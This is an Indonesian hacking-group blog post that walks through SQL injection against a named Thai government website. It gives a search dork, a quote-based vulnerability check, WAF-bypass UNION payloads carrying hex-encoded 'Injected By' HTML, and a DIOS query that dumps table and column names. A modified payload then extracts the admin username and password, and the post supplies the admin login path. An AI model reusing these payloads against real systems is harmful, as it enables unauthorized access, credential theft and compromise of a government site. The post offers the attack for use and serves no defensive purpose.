SQL Injection Website Pemerintahan Thailand

L0LSEC ID 05.32

Hy Teman - Teman Ane dapat Dork Vuln Sqli di Site Thailand, Dan yang mengeksekusinya Si VpoXrz Langsung aja yaa ke caranya.

Bahan Bahan : 
  • Dork : inurl:/admin1.php?content_id=
  • Query Inject Database : /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
  • Path Admin : /admin/login.php
  • Kesabaran <-- ingat
Caranya :
  1. Seperti Biasa Dorking dulu.
  2. Pilih Target dan Cek vuln caranya tambahkan ' di idnya.
    contoh : http://www.tbhuaimek.go.th/admin1.php?content_id=11'

  3. Btw Ini Web Terlindungi Oleh Waf Jadi Harus di Bypass Dulu.Untuk Membypassnya Kalian Gunakan DIOS Waf Bypass Dibawah ini :

    %27+AND+0+/*!50000UniON+SeLeCt*/+1,2,3,4,/*!50000cOnCat(0x3c696d67207372633d2268747470733a2f2f6672657a7a67616e73312e66696c65732e776f726470726573732e636f6d2f323031392f30392f313536383839373536333235372e706e67222077696474683d2235302522206865696768743d22353025223e,0x3c62723e,0x3c683120636f6c6f723d22677265656e223e496e6a65637465642042792056706f58727a3c2f68313e)*/--+-

  4. Jika Sudah masukkin maka muncul tuh angka di pojok kanan atas, disitu kita akan menginject databasenya menggunakan DIOS :

    /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

  5. Tulisan yang berada di sebelah kiri nantinya kita gantikan pada query information_schema.columns yang berada di DIOS. Sedangkan tulisan yang berada di sebelah kanan kita masukkan pada query table_name dan column_name. gantikan information_schema.columns dengan user. Untuk table_name ganti menjadi user_name dan column_name ganti menjadi user_pass. Menjadi Seperti ini :

    %27+AND+0+/*!50000UniON+SeLeCt*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345user*/)where@:=make_set(511,@,0x3c6c693e,/*!12345user_name*/,/*!12345user_pass*/)),@),/*!50000cOnCat(0x3c696d67207372633d2268747470733a2f2f6672657a7a67616e73312e66696c65732e776f726470726573732e636f6d2f323031392f30392f313536383839373536333235372e706e67222077696474683d2235302522206865696768743d22353025223e,0x3c62723e,0x3c683120636f6c6f723d22677265656e223e496e6a65637465642042792056706f58727a3c2f68313e)*/--+-

  6. Maka muncul Account adminnya.


  7. Sisanya kalian login aja. 
Tags
Reactions

Posting Komentar

0 Komentar